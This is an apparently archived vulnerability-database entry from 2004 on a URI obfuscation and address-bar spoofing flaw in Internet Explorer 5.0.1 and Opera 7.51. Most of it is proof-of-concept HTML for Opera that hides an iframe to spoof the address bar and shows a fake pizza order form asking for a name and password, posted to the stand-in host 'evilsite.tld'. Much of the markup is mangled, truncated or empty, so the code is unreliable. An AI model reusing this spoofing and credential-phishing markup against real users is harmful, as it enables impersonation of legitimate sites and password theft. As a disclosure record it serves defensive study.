Microsoft Internet Explorer 5.0.1 / Opera 7.51 - URI Obfuscation

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1054490 漏洞类型
发布时间 2004-06-10 更新时间 2004-06-10
漏洞平台 Multiple CVSS评分 N/A

A weakness is reported in Microsoft Internet Explorer and Opera allowing an attacker to obfuscate the URI of a link. This could facilitate the impersonation of legitimate web sites in order to steal sensitive information from unsuspecting users.

An attacker may exploit this weakness to make a user think they are visiting a legitimate site, when in reality they are being redirected to an attacker controlled site.

Update: an attacker may be able to use this issue to bypass zone restrictions in Internet Explorer.

Opera 7.51 is also affected.

!-- 10.06.04 courtesy of: bitlance -->
<a title="" href="">
<a href="">
<label for="foo">
<u style="cursor: pointer; color: blue">
<form method="get" action="">

<input id="foo" type="image" height="0" width="0">

Regular URIs are also vulnerable:
<a href="">test</a>

The following proof of concept is available for Opera:
[!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"]
[html lang="en"]
[meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"]
[meta http-equiv="Content-Script-Type" content="text/javascript"]
[meta http-equiv="Content-Style-Type" content="text/css"]
[meta http-equiv="REFRESH"
[title]Opera 7.51 Address Bar Spoofing Vulnerability[/title]
[script type="text/javascript"]
[!-- hide JavaScript from old browsers
var dummy="Do not remove this script element.";
// end hiding JavaScript --]
[style type="text/css"]
[!-- /* hide iframe element. */
iframe {
display: none !important;
/* hide iframe element. */ --]
[!-- /* pizza form */
body {
margin-left: 2em;
margin-right: 2em;
h1 { font-size:120%;}
h2 { font-size:100%;}
table { font-size:85%; background-color:buttonface; }
table caption {
background-color:activecaption; color:captiontext;
font-weight:bold; text-align:left; }
table table { font-size:100%; }
table input { font-family:verdana; font-size:100%; }
table select { font-family:verdana; font-size:100%; }
/* pizza form */ --]
[h1]Opera Browser version 7.51 Address Bar Spoofing Vulnerability[/h1]
[h2]Tested on Windows OS[/h2]
[p][a href="" title="Opera 7.51, Everything You Need
Opera 7.51[/a], Everything You Need Online
[iframe title="inline frame spoofing address bar"
This inline frame is hidden. See CSS.
[!-- below, phishing form order pizza --]
[h2]Welcome to Pizza Opera dot Com[/h2]
[form name="frmPizza" action="phishing://evilsite.tld"]
[table id="tblPizzaForm" cellspacing="0" cellpadding="3"]
[caption]Order Your Pizza[/caption]
[tr valign="top"]
[td][label for="txtName" accesskey="M"]Na[u]m[/u]e: [/label][/td]
[td][input type="text" name="txtName" id="txtName"][/td]
[tr valign="top"]
[td][label for="txtPassword" accesskey="P"][u]P[/u]assword: [/label][/td]
[td][input type="password" name="txtPassword" id="txtPassword"][/td]
[tr valign="top"]
[td][label for="selSize" accesskey="S"][u]S[/u]ize: [/label][/td]
[select name="selSize" id="selSize"]
[option value="0"]--- pick a size --- [/option]
[option value="1"]Small[/option]
[option value="2"]Medium[/option]
[option value="3"]Large[/option]
[tr valign="top"]
[td colspan="2"]
[fieldset id="fstCrust"]
[table cellpadding="1" cellspacing="0"]
[td][input type="radio" name="radCrust" id="radCrust_Thick"
[td][label for="radCrust_Thick"
[td][input type="radio" name="radCrust" id="radCrust_Thin"
[td][label for="radCrust_Thin" accesskey="N"]Thi[u]n[/u][/label][/td]
[tr valign="top"]
[td colspan="2"]
[fieldset id="fstToppings"]
[table cellpadding="1" cellspacing="0"]
[td][input type="checkbox" name="chkHam" id="chkHam" value="Ham"][/td]
[td][label for="chkHam" accesskey="H"][u]H[/u]am[/label][/td]
[td][input type="checkbox" name="chkPineapple" id="chkPineapple"
[td][label for="chkPineapple"
[td][input type="checkbox" name="chkExtraCheese" id="chkExtraCheese"
value="Extra Cheese"][/td]
[td][label for="chkExtraCheese" accesskey="E"][u]E[/u]xtra
[tr valign="top"]
[td colspan="2" align="right"][input type="submit" value=" Order!